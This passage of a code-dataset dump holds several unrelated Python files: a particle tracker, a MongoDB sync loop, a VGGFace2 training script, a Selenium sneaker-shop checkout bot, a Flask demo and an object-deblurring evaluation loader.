* 
np.ones((NXYP,NSP))\npcs_arr = np.ones((NXYP,NSP)) * pcs_vec.reshape(1,NSP)\nplon00 = plon_arr.flatten()\nplat00 = plat_arr.flatten()\npcs00 = pcs_arr.flatten()\n\n# make the list of start days (datetimes)\nidt_list = []\ndt = datetime.strptime(tr_dict['ds_first_day'], '%Y.%m.%d')\nfor nic in range(number_of_start_days):\n idt_list.append(dt)\n dt = dt + timedelta(days_between_starts)\n\n# make sure the output parent directory exists\noutdir00 = Ldir['LOo']\nLfun.make_dir(outdir00)\noutdir0 = Ldir['LOo'] + 'tracks/'\nLfun.make_dir(outdir0)\n\n# make the output directory (empty)\noutdir1 = tr_dict['exp_name'] + '/'\noutdir = outdir0 + outdir1\nLfun.make_dir(outdir, clean=True)\nprint(50*'*' + '\\nWriting to ' + outdir)\n\n# write a csv file of experiment information\nLfun.dict_to_csv(tr_dict, outdir + 'exp_info.csv')\n\n# step through the releases, one for each start day\nfor idt0 in idt_list:\n \n tt0 = time.time() # monitor integration time\n \n # name the release file by start day\n idt0_str = datetime.strftime(idt0,'%Y.%m.%d')\n outname = ('release_' + idt0_str + '.nc')\n print(' - ' + outname)\n out_fn = outdir + outname\n \n # we do the calculation in one-day segments\n for nd in range(tr_dict['days_to_track']):\n \n # get or replace the history file list for this day\n idt = idt0 + timedelta(days=nd)\n fn_list = tf1.get_fn_list(idt, Ldir)\n # if this is not the first day in the release, we use\n # fn_list_prev to get the first file (hour 0) for this day\n if nd > 0:\n fn_list = [fn_list_prev[-1]] + fn_list\n \n # write the grid file (once per experiment) for plotting\n if idt0 == idt_list[0]:\n g_infile = fn_list[0]\n g_outfile = outdir + 'grid.nc'\n tfnc.write_grid(g_infile, g_outfile)\n \n # DO THE TRACKING\n if nd == 0: # first day\n # set IC\n plon0 = plon00.copy()\n plat0 = plat00.copy()\n pcs0 = pcs00.copy()\n # do the tracking\n P = tf1.get_tracks(fn_list, plon0, plat0, pcs0, tr_dict, trim_loc=True)\n # save the results to NetCDF\n tfnc.start_outfile(out_fn, P)\n else: # subsequent days\n plon0 = P['lon'][-1,:]\n plat0 = P['lat'][-1,:]\n pcs0 = P['cs'][-1,:]\n P = tf1.get_tracks(fn_list, plon0, plat0, pcs0, tr_dict)\n tfnc.append_to_outfile(out_fn, P)\n fn_list_prev = fn_list\n \n print(' - Took %0.1f sec for %s day(s)' %\n (time.time() - tt0, str(tr_dict['days_to_track'])))\n print(50*'=')\n","sub_path":"tracker/tracker_1.py","file_name":"tracker_1.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"30544942","text":"# synchronize the databases\nimport pymongo\nimport time\n\nclient = pymongo.MongoClient()\nnew_ganjiLib = client['new_ganjiLib']\nlinks_lib = new_ganjiLib['links_lib']\nreal_links = new_ganjiLib['real_links']\ndetail = new_ganjiLib['detail']\nreal_detail = new_ganjiLib['reail_detail']\ncopy_version = new_ganjiLib['copy_version']\n\n\nwhile True:\n #link cleanup\n all_links = set([i['url'] for i in links_lib.find()]) # total amount of data\n links = set([i['url'] for i in real_links.find()]) # amount of clean data\n rest_of_links = all_links - links # amount of data that still needs to be added\n # #detail data cleanup\n # all_details = set([i['title'] for i in copy_version.find()])\n # details = set([i['title'] for i in real_detail.find()])\n # rest_of_details = all_details - details\n # #load urls\n # for i in rest_of_links:\n # real_links.insert_one({'url': i})\n # #load details\n # for i in rest_of_details:\n # real_detail.insert_one(i)\n print(\"load succeeded\")\n 
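# --- illustrative aside (not part of load.py): the sync above boils down to a
# set difference between what has been scraped and what has been cleaned. With
# plain Python sets standing in for the two Mongo collections:
_all_links = {'u1', 'u2', 'u3'}      # urls present in links_lib
_clean_links = {'u1'}                # urls already in real_links
_rest_of_links = _all_links - _clean_links
for _url in sorted(_rest_of_links):  # documents still to insert,
    print({'url': _url})             # i.e. real_links.insert_one({'url': _url})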
time.sleep(10)","sub_path":"project/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"270896417","text":"# Copyright (C) 2018-2019 by nepes Corp. All Rights Reserved\r\n# \r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n# \r\n# 1. Redistributions of source code must retain the above copyright notice,\r\n# this list of conditions and the following disclaimer.\r\n# \r\n# 2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n# \r\n# 3. Neither the name of the copyright holder nor the names of its contributors\r\n# may be used to endorse or promote products derived from this software without\r\n# specific prior written permission.\r\n# \r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\r\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\r\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\r\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\r\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\r\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\r\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\r\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\r\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\r\n# POSSIBILITY OF SUCH DAMAGE.\r\n\r\n\"\"\"\r\nDesigned Neural Networks structure for the Xenqore API library package for Python.\r\n\r\nCopyright (C) 2018-2019 by nepes Corp. 
All Rights Reserved\r\n\r\nTo use, simply 'import xenqore'\r\n\"\"\"\r\n\r\nimport os, sys\r\n\r\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\r\n\r\nimport xenqore\r\n\r\nimport numpy as np\r\n\r\nimport vggface2_custom\r\n\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\n\r\n\r\n### networks parameter setting\r\nnetwork_config = xenqore.utils.NetworkConfig()\r\nnetwork_config.user_defined_name = 'VGGFACE2'\r\n\r\n\r\n### layers parameter setting\r\n### setting arguments default : quantized_weight=True, weight_clip=True, use_bias=True\r\nlayers_config = xenqore.utils.layers_config()\r\n\r\n\r\n### activations parameter setting\r\n### setting arguments default : binary_activation=True\r\nactivations_config = xenqore.utils.activations_config()\r\n\r\n\r\n### dataset \r\n(train_x, train_y), (valid_x, valid_y) = vggface2_custom.vgg_load(network_config.classes, start_ind=0)\r\ntrain_x = train_x.astype('float')\r\ntrain_y = np.squeeze(train_y)\r\nvalid_x = valid_x.astype('float')\r\nvalid_y = np.squeeze(valid_y)\r\n\r\nprint('train_x shape : ', train_x.shape)\r\nprint('train_y shape : ', train_y.shape)\r\nprint('valid_x shape : ', valid_x.shape)\r\nprint('valid_y shape : ', valid_y.shape)\r\n\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n horizontal_flip=True,\r\n width_shift_range=0.1,\r\n height_shift_range=0.1\r\n)\r\ntrain_datagen.fit(train_x)\r\n\r\nvalid_datagen = ImageDataGenerator()\r\n\r\nmodel = xenqore.apps.VGGNet13(mode=0, \r\n network_config=network_config,\r\n layer_config=layers_config, \r\n act_config=activations_config, \r\n saved_model='', \r\n classes=network_config.classes,\r\n input_shape=train_x.shape[1:])\r\n\r\nmodel.summary()\r\n\r\n\r\nmodel.compile(\r\n optimizer = tf.keras.optimizers.Adam(learning_rate=network_config.initial_lr),\r\n loss = 'sparse_categorical_crossentropy',\r\n metrics=['accuracy']\r\n)\r\n\r\n\r\ndef lr_schedule(epoch, lr):\r\n if epoch < 100:\r\n return network_config.initial_lr * 0.1 ** (epoch // 50)\r\n if epoch % 20 == 0:\r\n lr = lr * 0.5\r\n return lr\r\n\r\n\r\ncallbacks = tf.keras.callbacks.ModelCheckpoint(\r\n filepath='tf_' + network_config.user_defined_name + '_result/model_{epoch}.h5',\r\n # Path where to save the model\r\n # The two parameters below mean that we will overwrite\r\n # the current checkpoint if and only if\r\n # the `val_accuracy` score has improved.\r\n save_best_only=True,\r\n monitor='val_accuracy',\r\n verbose=1)\r\n\r\n\r\ntensorboard_cbk = tf.keras.callbacks.TensorBoard(\r\n log_dir='tf_' + network_config.user_defined_name + '_result',\r\n histogram_freq=1, # How often to log histogram visualizations\r\n embeddings_freq=0, # How often to log embedding visualizations\r\n update_freq='epoch') # How often to write logs (default: once per epoch)\r\n\r\n\r\ntrained_model = model.fit_generator(\r\n train_datagen.flow(train_x, train_y, batch_size=network_config.batch_size),\r\n epochs=network_config.epochs,\r\n steps_per_epoch=train_y.shape[0] // network_config.batch_size,\r\n validation_data=valid_datagen.flow(valid_x, valid_y, batch_size=network_config.batch_size),\r\n validation_steps=valid_y.shape[0] // network_config.batch_size,\r\n verbose=1,\r\n callbacks=[callbacks, tensorboard_cbk, tf.keras.callbacks.LearningRateScheduler(lr_schedule, 
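# --- illustrative aside (not part of the xenqore script): the values that
# lr_schedule produces over training, assuming initial_lr = 0.01 (a made-up
# stand-in; the real value comes from xenqore.utils.NetworkConfig).
_initial_lr = 0.01

def _lr_schedule(epoch, lr):
    if epoch < 100:
        return _initial_lr * 0.1 ** (epoch // 50)
    if epoch % 20 == 0:
        lr = lr * 0.5
    return lr

_lr = _initial_lr
for _epoch in range(121):
    _lr = _lr_schedule(_epoch, _lr)
    if _epoch in (0, 50, 100, 120):
        print(_epoch, _lr)  # 0.01, 0.001, then halving: 0.0005, 0.00025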
verbose=1)]\r\n)\r\n","sub_path":"tutorial/VGGFACE2/xenqore_tf_vggface2_train.py","file_name":"xenqore_tf_vggface2_train.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462151461","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom config import keys\nimport time\n\ndef get_attrs(object):\n\treturn filter(lambda m: callable(getattr(object, m)), dir(object))\n\ndef login():\n\tdriver.find_element_by_xpath('//*[@id=\"client-email\"]').send_keys(keys['email'])\n\tdriver.find_element_by_xpath('//*[@id=\"cryptosenha\"]').send_keys(keys['password'])\n\tdriver.find_element_by_xpath('//*[@id=\"login\"]').click()\n\ttime.sleep(5)\n\ndef find_products():\n\tdriver.get('https://www.maze.com.br/pesquisa/?p=' + keys['search_key'])\n\telement = driver.find_element_by_xpath('//*[@id=\"center-middle\"]/article')\n\tfor e in element.find_elements(By.TAG_NAME, \"li\"):\n\t\tfor c in keys['target']:\n\t\t\tif (c.lower() in e.text.lower()):\n\t\t\t\treturn e.click()\n\tfind_products()\n\ndef select_size(url=None):\n\tif url:\n\t\tdriver.get(url)\n\telement = driver.find_element_by_xpath('//*[@id=\"variations\"]/fieldset/div[2]')\n\telements = element.find_elements(By.TAG_NAME, 'span')\n\tprint(len(elements))\n\tfor e in elements:\n\t\tif e.get_attribute(\"innerText\") in keys['sizes']:\n\t\t\tE = e.find_elements(By.TAG_NAME, 'input')[0]\n\t\t\tprint('sizeChosen = ' + e.get_attribute(\"innerText\"))\n\t\t\tclick_element(E);\n\t\t\treturn click_element(driver.find_element_by_xpath('//*[@id=\"btn-buy\"]'));\n\telements.reverse()\n\tfor e in elements:\n\t\tif e.get_attribute(\"innerText\").replace(',', '').isdigit():\n\t\t\tE = e.find_elements(By.TAG_NAME, 'input')[0]\n\t\t\tprint('size = ' + e.get_attribute(\"innerText\"))\n\t\t\tclick_element(E);\n\t\t\treturn click_element(driver.find_element_by_xpath('//*[@id=\"btn-buy\"]'));\n\ndef checkout():\n\tprint('checkout')\n\tclick_element(find_element_by_xpath('//*[@id=\"middle\"]/div/div/form/div/fieldset/input[1]'))\n\tif keys['payment_method'] == 'credit_card':\n\t\tcredit_card()\n\telse:\n\t\tslip()\n\ndef credit_card():\n\tdriver.get('https://www.maze.com.br/seguro/checkout/easy#payment/creditcard') #\n\t# time.sleep(1)\n\tcard_number = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[1]/div/div/div[1]/div[1]/input')\n\tsend_keys(card_number, keys['credit_card_number'])\n\n\tname = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[2]/div/div/div/input')\n\tsend_keys(name, keys['credit_card_name'])\n\n\tmonth = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[3]/div[1]/div/div/select[1]')\n\tsend_keys(month, keys['credit_card_month'])\n\n\tyear = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[3]/div[1]/div/div/select[2]')\n\tsend_keys(year, keys['credit_card_year'])\n\n\tcvv = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[3]/div[2]/div/div/div[1]/input')\n\tsend_keys(cvv, keys['credit_card_cvv'])\n\n\tparcelamento = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[4]/div/div/div/select')\n\tsend_keys(parcelamento, keys['parcelamento'])\n\n\tif not 
keys['test']:\n\t\tclick_element(driver.find_element_by_xpath('//*[@id=\"form-checkout-submit\"]'))\n\ndef slip():\n\tdriver.get('https://www.maze.com.br/seguro/checkout/easy#payment/paymentslip')\n\tif not keys['test']:\n\t\tclick_element(find_element_by_xpath('//*[@id=\"form-checkout-submit\"]'))\n\n\n## aux methods\ndef click_element(e):\n\tprint('click()' + e.get_attribute(\"innerText\"))\n\ttry:\n\t\te.click()\n\texcept:\n\t\ttime.sleep(.100)\n\t\tclick_element(e)\n\ndef find_element_by_xpath(string):\n\tprint('find_element ' + string)\n\ttry:\n\t\treturn driver.find_element_by_xpath(string)\n\texcept:\n\t\ttime.sleep(.100)\n\t\treturn find_element_by_xpath(string)\n\ndef send_keys(obj, string):\n\ttry:\n\t\tobj.send_keys(string)\n\texcept:\n\t\ttime.sleep(.100)\n\t\tsend_keys(obj, string)\n\n\nif __name__ == '__main__':\n # load chrome\n options = webdriver.ChromeOptions()\n options.add_argument(\"--start-maximized\")\n driver = webdriver.Chrome(executable_path='./chromedriver', options=options)\n\n # get product url\n driver.get(\n \t'https://www.maze.com.br/painel-de-controle'\n \t# 'https://www.maze.com.br/tenis-nike-sb-dunk-high-pro-truck-it-preto-p9028/'\n \t)\n\n login()\n find_products()\n select_size(\n \t# 'https://www.maze.com.br/tenis-nike-sb-dunk-high-pro-truck-it-preto-p9028/'\n \t)\n\n checkout()\n\n\n # https://www.maze.com.br/seguro/checkout/easy#payment/paymentslip\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"366238812","text":"from flask import Flask, render_template\nfrom models import Lingkaran\n\napplication = Flask(__name__)\n\n@application.route('/')\ndef index():\n\tstr_var = 'pengembang aplikasi web dengan flask'\n\tint_var = 15\n\tfloat_var = 29.05\n\tlist_var = [1,2,3]\n\tdict_var = {'satu': 1, 'dua': 2, 'tiga': 3}\n\tmodel = Lingkaran(30.0)\n\n\t#send the values to the template\n\treturn render_template('index.html',\n\t\tstr_var=str_var,\n\t\tint_var=int_var,\n\t\tfloat_var=float_var,\n\t\tlist_var=list_var,\n\t\tdict_var=dict_var,\n\t\tmodel=model)\n\nif __name__ == '__main__':\n\tapplication.run(debug=True)\n","sub_path":"variable/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"642734537","text":"import h5py\nimport os, glob\nimport numpy as np\nimport torch\n\nfrom dataloaders.loader import get_transform\nfrom dataloaders.reporters import *\nfrom main_settings import *\nfrom utils import *\nfrom helpers.torch_helpers import *\nimport scipy.io\nfrom torchvision.utils import save_image\nfrom PIL import Image, ImageDraw\nimport cv2\nimport time\n\nimport pdb\nfrom vis import *\n\ndef get_tbd_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_tbd_folder, '*-8.mat')))\n\tfiles = files[['golf' not in f for f in files]]\n\tfiles = np.r_[files, np.array(glob.glob(os.path.join(g_tbd_folder, '*-12.mat')))]\n\tfiles = np.r_[files, np.array(glob.glob(os.path.join(g_tbd_folder, '*-8_newGT.mat')))]\n\tfiles = files[['ping_wall' not in f for f in files]]\n\tfiles = files[['fall_coin' not in f for f in files]]\n\tfiles.sort()\n\treturn files\n\ndef get_tbd3d_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_tbd3d_folder, '*.mat')))\n\tif files.shape[0] == 0:\n\t\tfiles = np.array(glob.glob(os.path.join(g_tbd3d_folder, 'imgs/*_GT_*')))\n\t\tfiles = np.array([ff+'.mat' for ff in 
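# --- illustrative aside (not part of bot.py): the three aux helpers above all
# follow the same try/sleep/retry shape, but recurse forever if the element
# never appears. A bounded, reusable version of that pattern ('fn' is any
# zero-argument callable, e.g. a lambda wrapping driver.find_element_by_xpath):
import time

def retry(fn, attempts=50, delay=0.1):
	for _ in range(attempts):
		try:
			return fn()
		except Exception:
			time.sleep(delay)
	raise RuntimeError('gave up after %d attempts' % attempts)

# usage sketch: retry(lambda: driver.find_element_by_xpath('//*[@id="btn-buy"]'))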
files])\n\tfiles.sort()\n\treturn files\n\ndef get_falling_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_falling_folder, '*_GTgamma.mat')))\n\tif files.shape[0] == 0:\n\t\tfiles = np.array(glob.glob(os.path.join(g_falling_folder, 'imgs/*_GTgamma')))\n\t\tfiles = np.array([ff+'.mat' for ff in files])\n\tfiles.sort()\n\treturn files\n\ndef get_wildfmo_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_wildfmo_folder, '*.mov')))\n\tfiles.sort()\n\treturn files\n\ndef get_youtube_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_youtube_folder, '*')))\n\tfiles.sort()\n\tinliers = [not '.' in file for file in files]\n\tfiles = files[inliers]\n\tfiles = np.array([file+'.avi' for file in files])\n\tfiles = files[1:]\n\treturn files\n\ndef evaluate_on(encoder, rendering, device, mode = 'tbd'):\n\tlog_folder = tmp_folder+mode+'_eval/'\n\tmedn = 7\n\tupdate_bg = True\n\tverbose = False\n\tdo_defmo = True\n\tdo_deblatting = False\n\tdo_sota18 = False\n\tdo_deblurgan = False\n\tdo_tbdo = False\n\n\teval_d = g_eval_d\n\teval_d = 1\n\tmulti_f = 10\n\n\teval_gt = False\n\teval_gt_steps = 10\n\n\tif do_sota18:\n\t\tfrom helpers.sota18_runner import run_sota18\n\tif do_deblurgan:\n\t\tfrom helpers.deblurgan_runner import run_deblurgan\n\n\tshift = 0\n\text_factor = 4\n\tif mode == 'tbd':\n\t\tfiles = get_tbd_dataset()\n\t\tfolder = g_tbd_folder\n\telif mode == 'tbd3d':\n\t\tfiles = get_tbd3d_dataset()\n\t\tfolder = g_tbd3d_folder\n\t\tmedn = 50\n\telif mode == 'tbdfalling':\n\t\tfiles = get_falling_dataset()\n\t\tfolder = g_falling_folder\n\t\tshift = 250\n\t\tmedn = 50\n\t\text_factor = 4\n\telif mode == 'wildfmo':\n\t\tfiles = get_wildfmo_dataset()\n\t\tfolder = g_wildfmo_folder\n\t\tmedn = 50\n\t\text_factor = 1\n\telif mode == 'youtube':\n\t\tfiles = get_youtube_dataset()\n\t\tfolder = g_youtube_folder\n\telse:\n\t\tprint('Mode not found!')\n\n\tif do_defmo:\n\t\tav_score_tracker = AverageScoreTracker(files.shape)\n\tif do_deblatting:\n\t\tav_score_tracker_tbd = AverageScoreTracker(files.shape,'tbd', False)\n\t\tav_score_tracker_tbd3d = AverageScoreTracker(files.shape, 'tbd3d', False)\n\tif do_tbdo:\n\t\tav_score_tracker_tbd3do = AverageScoreTracker(files.shape, 'tbd3do', False)\n\tif do_sota18:\n\t\tav_score_tracker_sota18 = AverageScoreTracker(files.shape, 'sota18', False)\n\tif do_deblurgan:\n\t\tav_score_tracker_dg = AverageScoreTracker(files.shape, 'deblurgan', False)\n\n\tfor kkf, ff in enumerate(files):\n\t\tif mode == 'tbd':\n\t\t\tif 'GX' in ff:\n\t\t\t\tmedn = 7\n\t\t\telse:\n\t\t\t\tmedn = 50\n\t\tgtp = GroundTruthProcessor(ff,kkf,folder,medn,shift,update_bg)\n\t\tif do_defmo:\n\t\t\tlogger = SequenceLogger(log_folder, gtp)\n\t\tif do_deblatting:\n\t\t\tlogger_tbd = SequenceLogger(log_folder, gtp, 'tbd')\n\t\t\tlogger_tbd3d = SequenceLogger(log_folder, gtp, 'tbd3d')\n\t\t\tseq_score_tracker_tbd = SequenceScoreTracker(gtp.nfrms, 'tbd', False)\n\t\t\tseq_score_tracker_tbd3d = SequenceScoreTracker(gtp.nfrms, 'tbd3d', False)\n\t\tif do_sota18:\n\t\t\tseq_score_tracker_sota18 = SequenceScoreTracker(gtp.nfrms, 'sota18', False)\n\t\tif do_tbdo:\n\t\t\tlogger_tbd3do = SequenceLogger(log_folder, gtp, 'tbd3do')\n\t\t\tseq_score_tracker_tbd3do = SequenceScoreTracker(gtp.nfrms, 'tbd3do', False)\n\t\tif do_deblurgan:\n\t\t\tseq_score_tracker_dg = SequenceScoreTracker(gtp.nfrms, 'deblurgan', False)\n\n\t\tseq_score_tracker = SequenceScoreTracker(gtp.nfrms)\n\t\test_traj = None\n\t\tfor kk in range(gtp.nfrms):\n\t\t\tgt_traj, radius, bbox = gtp.get_trajgt(kk)\n\t\t\tI, B = 
gtp.get_img(kk)\n\t\t\tgt_hs = gtp.get_hs(kk)\n\n\t\t\tif not gtp.w_trajgt:\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\tbbox, radius = fmo_detect_hs(gt_hs,B)\n\t\t\t\telse:\n\t\t\t\t\tbbox, radius = fmo_detect_maxarea(I,B)\n\t\t\t\tif np.min(radius) < 5:\n\t\t\t\t\tif verbose:\n\t\t\t\t\t\tprint('Seq {}, frm {}, nothing found'.format(gtp.seqname, gtp.start_ind+kk))\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbbox = extend_bbox_uniform(bbox,radius,I.shape)\n\n\t\t\tbbox_tight = extend_bbox_uniform(bbox.copy(),10,I.shape)\n\t\t\tif gtp.use_hs:\n\t\t\t\tbbox_tight = bbox_fmo(bbox_tight,gt_hs,B)\n\t\t\tbbox = extend_bbox(bbox_tight.copy(),ext_factor*np.max(radius),g_resolution_y/g_resolution_x,I.shape)\n\n\t\t\tim_crop = crop_resize(I, bbox, (g_resolution_x, g_resolution_y))\n\t\t\tbgr_crop = crop_resize(B, bbox, (g_resolution_x, g_resolution_y))\n\t\t\t\n\t\t\tif do_defmo:\n\t\t\t\tpreprocess = get_transform()\n\t\t\t\tinput_batch = torch.cat((preprocess(im_crop), preprocess(bgr_crop)), 0).to(device).unsqueeze(0).float()\n\t\t\t\twith torch.no_grad():\n\t\t\t\t\tstart = time.time()\n\t\t\t\t\tlatent = encoder(input_batch)\n\t\t\t\t\tsteps = gtp.nsplits*multi_f\n\t\t\t\t\tif eval_d > 1:\n\t\t\t\t\t\tsteps = gtp.nsplits*eval_d + 1\n\t\t\t\t\t\tmulti_f = 1\n\t\t\t\t\ttimes = torch.linspace(0,1,steps).to(device)\n\t\t\t\t\trenders_orig = rendering(latent,times[None])\n\t\t\t\t\tif eval_d > 1:\n\t\t\t\t\t\trenders = renders_orig[:,:-1].reshape(1, gtp.nsplits, eval_d, 4, g_resolution_y, g_resolution_x).mean(2)\n\t\t\t\t\telse:\n\t\t\t\t\t\trenders = renders_orig\n\t\t\t\t\tav_score_tracker.next_time(time.time() - start)\n\n\t\t\t\trenders_rgba = renders[0].data.cpu().detach().numpy().transpose(2,3,1,0)\n\t\t\t\test_hs_crop = rgba2hs(renders_rgba, bgr_crop)\n\n\t\t\t\test_traj_prev = est_traj\n\t\t\t\tif True:\n\t\t\t\t\test_traj = renders2traj(renders,device)[0].T.cpu()\n\t\t\t\telse:\n\t\t\t\t\test_traj = renders2traj_bbox(renders_orig[0,g_eval_d//2+1::g_eval_d].data.cpu().detach().numpy().transpose(2,3,1,0))\n\t\t\t\test_traj = rev_crop_resize_traj(est_traj, bbox, (g_resolution_x, g_resolution_y))\n\n\t\t\tif do_deblatting or do_tbdo:\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\tbbox_temp = bbox_detect_hs(crop_only(gt_hs[:,:,:,0],bbox_tight), crop_only(B,bbox_tight))\n\t\t\t\t\tif len(bbox_temp) == 0:\n\t\t\t\t\t\tbbox_temp = bbox_tight\n\t\t\t\t\tdebl_dim = bbox_temp[2:] - bbox_temp[:2]\n\t\t\t\telse:\n\t\t\t\t\tdebl_dim = (radius,radius)\n\t\t\t\tbbox_debl = extend_bbox_uniform(bbox_tight.copy(),0.5*radius,I.shape)\n\t\t\t\tif do_tbdo and gtp.w_trajgt:\n\t\t\t\t\trgba_tbd3d_or, Hso_crop = deblatting_oracle_runner(crop_only(I,bbox_debl),crop_only(B,bbox_debl),debl_dim,gt_traj[[1,0]]-bbox_debl[:2,None])\n\t\t\t\t\tHso = rev_crop_resize(Hso_crop[:,:,None,:][:,:,[-1,-1,-1],:],bbox_debl,np.zeros(I.shape))\n\t\t\t\t\test_hs_tbd3d0 = np.zeros(I.shape+(gtp.nsplits,))\n\t\t\t\t\tfor tmki in range(gtp.nsplits): \n\t\t\t\t\t\tHsc = Hso[:,:,0,tmki]/np.sum(Hso[:,:,0,tmki])\n\t\t\t\t\t\test_hs_tbd3d0[:,:,:,tmki] = fmo_model(B,Hsc,rgba_tbd3d_or[:,:,:3,tmki],rgba_tbd3d_or[:,:,3,tmki])\n\t\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t\tseq_score_tracker_tbd3do.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_tbd3d0,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\n\t\t\t\tif do_deblatting:\n\t\t\t\t\tstart = time.time()\n\t\t\t\t\test_hs_tbd_crop, est_hs_tbd3d_crop, rgba_tbd_crop, rgba_tbd3d_crop, est_traj_tbd, Hs = 
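# --- illustrative aside (not part of tbd_loader.py): the reshape/mean applied
# to renders_orig above turns nsplits*eval_d rendered sub-frames into nsplits
# temporally averaged output frames. Toy-shaped numpy check:
import numpy as np
_nsplits, _eval_d, _C, _H, _W = 8, 3, 4, 6, 5
_renders_orig = np.random.rand(1, _nsplits * _eval_d + 1, _C, _H, _W)
_renders = _renders_orig[:, :-1].reshape(1, _nsplits, _eval_d, _C, _H, _W).mean(2)
assert _renders.shape == (1, _nsplits, _C, _H, _W)
# frame k is the mean of sub-frames k*eval_d ... (k+1)*eval_d - 1
assert np.allclose(_renders[0, 0], _renders_orig[0, :_eval_d].mean(0))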
deblatting_runner(crop_only(I,bbox_debl),crop_only(B,bbox_debl),gtp.nsplits,debl_dim)\n\t\t\t\t\tav_score_tracker_tbd3d.next_time(time.time() - start)\n\t\t\t\t\test_traj_tbd[0] += bbox_debl[1]\n\t\t\t\t\test_traj_tbd[1] += bbox_debl[0]\n\t\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t\tgt_hs_debl_crop = crop_only(gt_hs, bbox_debl)\n\t\t\t\t\t\test_hs_tbd_crop, do_flip_debl = sync_directions(est_hs_tbd_crop, gt_hs_debl_crop)\n\t\t\t\t\t\test_hs_tbd3d_crop, do_flip_debl = sync_directions(est_hs_tbd3d_crop, gt_hs_debl_crop)\n\t\t\t\t\t\tif do_flip_debl:\n\t\t\t\t\t\t\trgba_tbd_crop = rgba_tbd_crop[:,:,:,::-1]\n\t\t\t\t\t\t\trgba_tbd3d_crop = rgba_tbd3d_crop[:,:,:,::-1]\n\t\t\t\t\test_hs_tbd = rev_crop_resize(est_hs_tbd_crop,bbox_debl,I)\n\t\t\t\t\test_hs_tbd3d = rev_crop_resize(est_hs_tbd3d_crop,bbox_debl,I)\n\t\t\t\t\trgb_tbd_crop = rev_crop_resize(rgba2rgb(rgba_tbd_crop),bbox_debl,I)\n\t\t\t\t\trgb_tbd3d_crop = rev_crop_resize(rgba2rgb(rgba_tbd3d_crop),bbox_debl,I)\n\t\t\t\t\tlogger_tbd.write_trajest(est_traj_tbd)\n\t\t\t\t\tif gtp.w_trajgt:\n\t\t\t\t\t\tiou = seq_score_tracker_tbd.next_traj(kk,gt_traj,est_traj_tbd,radius)\n\t\t\t\t\tif gtp.use_hs:\n\t\t\t\t\t\tseq_score_tracker_tbd.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_tbd,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\t\tseq_score_tracker_tbd3d.next_appearance(kk,crop_only(gt_hs,bbox_tight),crop_only(est_hs_tbd3d,bbox_tight),crop_only(I,bbox_tight),crop_only(B,bbox_tight))\n\t\t\t\t\tlogger_tbd3d.write_crops(kk,crop_only(rgb_tbd3d_crop,bbox_tight), 